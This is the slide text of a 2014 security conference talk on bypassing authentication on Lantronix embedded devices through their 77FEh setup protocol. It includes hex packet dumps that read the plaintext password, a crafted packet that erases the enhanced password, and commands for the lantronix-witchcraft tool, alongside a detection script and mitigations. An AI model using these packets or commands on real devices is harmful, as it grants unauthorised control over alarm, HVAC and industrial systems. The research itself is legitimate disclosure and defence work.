Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014


Confidence 2014

Exploring treasures of 77FEh
Getting access to Lantronix devices

Vlatko Kosturjak, Diverto
@k0st

Who are you!?!!??

Security Jedi at Diverto
Bringing balance to the force

Experience
Offensive (Penetration tester)

Defensive (Developer/System Administrator/...)

Have code in: Nmap, Metasploit, OpenVAS,

Author of free software: https://github.com/kost/

If you trust in certificates
CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...

Agenda

Introduction - Lantronix

Physical access

WTF is 77FEh?

Vulnerabilities & Exploitation

Recommendations

Questions and answers

45 minutes

Lantronix

Source: www.lantronix.com

You can find them as integral part of

Alarms

HVACs

Pool monitoring systems

Sprinkler controllers

Hacked vacuum cleaners - Roombas

Embedded systems

Industrial systems

Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight

What are they actually running?

OS
CoBos (mostly)

Evolution OS/Linux

ThreadX

Linux

Support
1 or more serial ports

Modbus (few models)

10/100 Ethernet

Physical access

Like usual
Game over

Serial access
No password by design

Requirements
Standard TTL cable

BusPirate

...

Connecting to serial port...

9600 bps 8/N/1

Flow control: None

Most frequent services available over TCP/IP

Web (tcp/80)

Telnet (tcp/9999)

77FEh (tcp-udp/30718)

SNMP (udp/161)

Telnet administration interface
What is this?
Mostly information disclosures
Simple web server
Serving applet JAR which talks to port 30718

Device Discovery

Ask :)

Look if you have physical access

Passive

Active/Scanning
Standard port scanning is fine with conservative timing

Broadcast UDP to specific Lantronix ports (30718)

Beware
Version scanning (-sV) or running vulnerability scanners may misconfigure the device

Telnet administration

$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.

MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :

So, WTF is 77FEh finally?

0x77FE = 30718 in decimal

TCP/UDP protocol for device setup
Proprietary protocol

Used by DeviceInstaller (proprietary software from Lantronix)

Designed for
Setup of device

Administration of device

Getting device info

Insecurity (sorry, had to write it, you'll see later ;) )

Sample 77FEh communication

[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....

[v] Received 30 bytes:
0x00000000 (00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
0x00000010 (00016) 62a7d944 00000000 00204a91 84fb b..D..... J...

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q

Query setup request (4)
Query setup response (4)
MAC address of the device (6)
Device type

Interesting request #1

[v] Sending 4 bytes:

0x00000000 (00000) 000000f8 ....

[v] Received 124 bytes:

0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST

0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........

0x00000020 (00032) cc070000 00000000 00000000 00000000 ................

0x00000030 (00048) 00000000 00000000 00000000 00000000 ................

0x00000040 (00064) 00000000 00000000 00000000 00000000 ................

0x00000050 (00080) 00000000 00000000 00000000 00000000 ................

0x00000060 (00096) 00000000 00000000 00000000 00000000 ................

0x00000070 (00112) 00000000 00000000 00000000 ............

Query setup (4)
Simple password in plaintext (4)
IPv4 (4)

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P

Previous work

Metasploit
Rob Vinson
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/

https://github.com/robvinson/metasploit-modules

Metasploit modules for simple passwords by jgor
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password

http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version

Tools
Simple C program by jgor
https://github.com/jgor/lantronix-telnet-pw

But...

Simple password is not set

Device still asks for password

Further digging
Enhanced password in place

You cannot get/reset the enhanced password easily

Length is bigger (4->16)

Challenge!!!

Introduction to enhanced passwords

Source: Lantronix documentation

Feature/Type             Simple Password   Enhanced Password
Length                   4                 16
Visible in query setup   yes               no

Source: Mohdafri.com

Interesting request - #2

[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....

[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C

Simple password in plaintext (4)
Query ext version request (4)
Version (6)

Interesting request #3

Request to query configuration: 000000eX

Response to query configuration: 000000bX, followed by 126 bytes of setup

X = number of the setup record (0-F):
0 basic setup record (simple password, IP, ...)

1 security record (enhanced password, AES key, SNMP, ...)

2 specific products / situations

3 OEMs

...

Wrong! Request for security record 1 provides just zero bytes!

Interesting request #4

Request to change configuration: 000000cX, followed by 126 bytes of setup

Response to change configuration: 000000bX

X = number of the setup record (0-F):
0 basic setup record

1 security record

2 specific products / situations

3 OEMs

Setting setup record 1 for security

[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..

[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E

Setting setup record 1 was successful
Set setup record 1 (security) request
SNMP community string (13)
Enhanced password (16)

Enhanced password gone
No password to enter!

$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.

MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1

Press Enter for Setup Mode
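As an added example, not code from the talk or from lantronix-witchcraft: a small Python classifier for 77FEh payloads taken off port 30718 (for instance exported from a capture), meant for a defender watching for this traffic. It tags configuration writes (000000cX + 126 bytes) as critical and flags replies that carry the plaintext simple password; field offsets are the ones visible in the hex dumps on these slides, and the sample payloads are transcribed from those dumps and zero-padded to the stated lengths.

```python
from dataclasses import dataclass, field

# Opcodes seen in the slides: last byte of the 4-byte 0x000000XX header
SETUP_RESP, IP_RESP, VER_RESP = 0xF7, 0xF9, 0xF5
RECORD_LEN = 126  # setup bytes following a query/change configuration header

@dataclass
class Event:
    kind: str
    severity: str
    fields: dict = field(default_factory=dict)

def _cstr(raw: bytes) -> str:
    """Decode a NUL-terminated ASCII field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")

def classify_77feh(pkt: bytes) -> Event:
    """Classify one 77FEh payload and extract what it exposes (offsets from the slides' dumps)."""
    if len(pkt) < 4 or pkt[:3] != b"\0\0\0":
        return Event("not-77feh", "info")
    op, rec = pkt[3], pkt[3] & 0x0F
    if op == SETUP_RESP and len(pkt) >= 30:            # reply to 000000f6: MAC in last 6 bytes
        mac = ":".join(f"{b:02x}" for b in pkt[24:30])
        return Event("query-setup-response", "low", {"mac": mac, "type": _cstr(pkt[8:12])})
    if op == IP_RESP and len(pkt) >= 16:               # reply to 000000f8: IPv4 + simple password
        ip = ".".join(str(b) for b in pkt[4:8])
        return Event("ip-setup-response", "high", {"ip": ip, "simple_password": _cstr(pkt[12:16])})
    if op == VER_RESP and len(pkt) >= 24:              # reply to 000000f4: simple password + version
        return Event("ext-version-response", "high",
                     {"simple_password": _cstr(pkt[12:16]), "version": _cstr(pkt[16:24])})
    if op >> 4 == 0xE:                                 # 000000eX: read setup record X
        return Event("query-config-record", "medium", {"record": rec})
    if op >> 4 == 0xC and len(pkt) == 4 + RECORD_LEN:  # 000000cX + 126 bytes: write setup record X
        f = {"record": rec}
        if rec == 1:  # security record; "public" sits at byte 38 in the slide's dump
            f["snmp_community"] = _cstr(pkt[38:51])
        return Event("set-config-record", "critical", f)
    if op >> 4 == 0xB:                                 # 000000bX: record dump (130 bytes) or write ack (4 bytes)
        kind = "config-record-response" if len(pkt) == 4 + RECORD_LEN else "config-ack"
        return Event(kind, "info", {"record": rec})
    return Event("unknown-77feh", "medium", {"opcode": op})

# Constructed samples: payloads transcribed from the slides, zero-padded to the stated lengths
SAMPLES = {
    "setup_resp": bytes.fromhex("000000f7 00108005 58324400 df0e0000 62a7d944 00000000 00204a91 84fb"),
    "ip_resp": bytes.fromhex("000000f9 c0a809c9 00000000 54455354 c0a80905 4c020000 141e141e 0a0a0a0a cc070000") + bytes(88),
    "ver_resp": bytes.fromhex("000000f5 09040000 00000000 54455354 352e382e 382e3300") + bytes(8),
    "set_sec": bytes.fromhex("000000c1") + bytes(34) + b"public" + bytes(86),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, classify_77feh(pkt))
```

Anything classified "set-config-record" coming from a host that is not the legitimate management station is the event worth alerting on; the "high" responses show which devices still hand out a plaintext simple password.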

Authentication Algorithm Guess

Authenticate
Enhanced password set: ask for enhanced password
Enhanced password not set: check simple password
Simple password set: ask for simple password
Simple password not set: display setup menu
Password OK: display setup menu

New tool: lantronix-witchcraft

77FEh protocol implementation

77FEh security related utility

All the tricks mentioned implemented

Free software: GPL2

Requirement: Perl

Available at
https://github.com/kost/lantronix-witchcraft

Basic usage:

Display MAC address: ./lantronix-witchcraft.pl -Q

Display simple password (up to 4 characters): ./lantronix-witchcraft.pl -P

Reset security record (together with enhanced password): ./lantronix-witchcraft.pl -E

Reset security record without AES (with enhanced password): ./lantronix-witchcraft.pl -S

Dump setup records: ./lantronix-witchcraft.pl -G -D

Brave enough?

One command to rule them all

Display MAC address and simple password, dump setup records, reset security records together with enhanced password:

./lantronix-witchcraft.pl -C -Q -P -E -G -D

Still wondering why automatic scanning is bad for Lantronix?

Dump of setup record:

00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|

Correct way

Ask
Someone responsible if they could have something like that

Send broadcast query packet to 77FEh

Identify ports 30718 open (TCP or UDP)

Dump setup records

Play ;)

Check if it is still working...
If yes, perfect

If not: huh, but you should restore setup records somehow ;)

It's not about Lantronix...

...they warned the vendors about it in their documentation

Source: Lantronix documentation

Disclosure Problem

It's more about vendors who implement Lantronix in their devices

Whom to report to?
Lantronix: I guess they know their protocol ;)

OEMs: hard to find all their customers ;)

Awareness
Conference

Tools

But maybe it could be done...

Add white list

Encryption/SSL?

Source: Lantronix documentation

Recommendations

Have some other device to VPN/SSL tunnel the services

Telnet only through VPN or other secure channel to administration interface

Disable 77FEh if not needed

Filter 77FEh on network devices so that only allowed hosts can reach it

Disable other unnecessary services (SNMP, telnet, etc.).

Summary

Source: duki@fb

Summary

There are ways to pass beyond authentication (if 77FEh is enabled)
Simple passwords

Enhanced passwords

Tools
Metasploit Lantronix modules

https://github.com/kost/lantronix-witchcraft

Recommendations
Disable 77FEh if not needed, or filter 77FEh on network devices so that only allowed hosts can reach it

Tunnel VPN/SSL all communication to these devices

Future
There are things to research: a way to obtain the enhanced password or AES keys, for example

Acknowledgements - Thanks

Previous work (Simple Passwords)
Rob Vinson
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/

https://github.com/robvinson/metasploit-modules

Metasploit modules for simple passwords by jgor
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password

http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version

https://github.com/jgor/lantronix-telnet-pw

Colleagues
Dalibor Dosegovi, hardware wizard

Thank you!

Questions and Answers
@k0st

MosEisleyLab